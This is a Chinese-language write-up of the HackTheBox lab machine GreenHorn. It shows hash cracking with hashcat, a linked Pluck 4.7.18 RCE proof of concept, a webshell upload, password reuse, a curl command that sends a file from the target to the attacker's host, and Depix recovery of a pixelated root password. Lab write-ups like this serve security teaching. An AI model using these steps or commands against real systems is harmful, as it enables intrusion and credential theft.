GreenHorn Writeup

admin 2025年1月11日11:54:49评论4 views字数 2161阅读7分12秒阅读模式

#概述 (Overview)

GreenHorn Writeup

HOST:10.10.11.25

OS:LINUX

发布时间:2024-07-20

完成时间:2024-11-02

机器作者:nirza

困难程度:EASY

机器状态:退休

MACHINE TAGS:#Depix #goshs #HashCat

#攻击链 (Kiillchain)

GreenHorn 是一个 Easy 等级的简单机器,通过公共代码库中的泄露项目获取加的密码,对其进行碰撞枚举得到明文。随后利用 Pluck 中的漏洞实现远程代码执行,还原马斯克信息获取 root 凭据。

#枚举(Enumeration)

使用工具对目标服务器开放端口进行识别,这里我改用gogo这款工具而非 nmap。

[+] tcp://10.10.11.25:22                ssh[open] SSH-2.0-OpenS[+] http://10.10.11.25:3000             gogs||focus:gitlab||focus:swagger-ui     [200] GreenHorn[+] http://10.10.11.25:80       nginx/1.18.0 (Ubuntu)   nginx    [302]302 Found

目标服务器对外暴漏了三个端口,其两个通过指纹识别出是 Web 站点,结合现用信息打点的入口集中在 Web 站点上即可。

pluck-cms - Port 80

该端口上部署的是一个开源的 CMS 系统,Pluck CMS是开源的一个用 PHP 编写的小型简单的内容管理系统,简单浏览下子可以知道当前版本是4.7.18

GreenHorn Writeup

而登录页面只需要一个 password ,后续这个可以进行简单的弱口令登录尝试,顺便查询下历史漏洞,成功找到 RCE 链。

Pluck 在 4.7.18 版本存在一个安全漏洞,该漏洞源于没有限制失败的登录尝试,允许攻击者执行暴力攻击。

https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC

https://www.exploit-db.com/exploits/51592

GreenHorn Writeup

Gitea - Port 3000

这个没什么好介绍的,老朋友 gitea(开源代码仓库软件)在之前的靶机上也见过。

GreenHorn Writeup

#立足点(Foothold)

在 Gitea 上的探索中能找到一个对外可见的代码项目,而这个项目命名与当前靶机 80 端口上的站点一致。

GreenHorn Writeup

是使用 git clone 命令将代码仓库拉直本地进行分析,通过阅读代码可以知道密码被加密保存在data/settings/pass.php文件中,而加密类型为:sha512。

# cat data/settings/pass.php<?php$ww='d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';?>
GreenHorn Writeup

使用 hashcat 工具碰撞密码成功得到明文密码为:iloveyou1

$ hashcat -m1700-O--force-a0 ./hash.txt ./rockyou.txtd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1
GreenHorn Writeup

接下来就简单了,跟着前面搜到的 POC 工具链去操作,通过在http://greenhorn.htb/admin.php?action=installmodule上传 WebShell 成功获得服务器会话。

#横向移动(Lateral Movement)

检查在下/home目录能看到存在一个 junior 的用户,复用密码则需要一个完整的 tty shell,横向至 junior 用户下就可以得到 user flag。

GreenHorn Writeup

#权限提升(Privilege Escalation)

在当前用户文件夹内进行查找,发现存在一个 PDF 文件,使用goshs工具进行文件传递。它近期 kali 里收录的新工具源,一个 SimpleHTTPServer 用来做文件传递和下载的。

# kali 上开启文件服务$ goshs -p8801-uo-d /home/x/Public# 文件传递到 kalicurl-F'file=@Using OpenVAS.pdf' http://10.10.14.14:8801/
GreenHorn Writeup

里面密码这里存在马赛克,需要对它进行还原。借助Depix进行还原,最简单的方法可以将 PDF 文件的后缀改成.zip后缀,解压后在里面找到这个马斯克图片就行。我则是使用工具将 PDF 中的图片导出:https://tools.pdf24.org/en/extract-images

GreenHorn Writeup

使用 Depix 进行图片内容还原:

GreenHorn Writeup

GreenHorn Writeup

尝试了很多次,最后也就处理到这种程度了,猜猜改改就得到了 root 密码是:sidefromsidetheothersidesidefromsidetheotherside

GreenHorn Writeup

成功拿到 root flag。

#参考

原文始发于微信公众号(一个人的安全笔记):GreenHorn Writeup

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日11:54:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GreenHorn Writeuphttps://cn-sec.com/archives/3611050.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息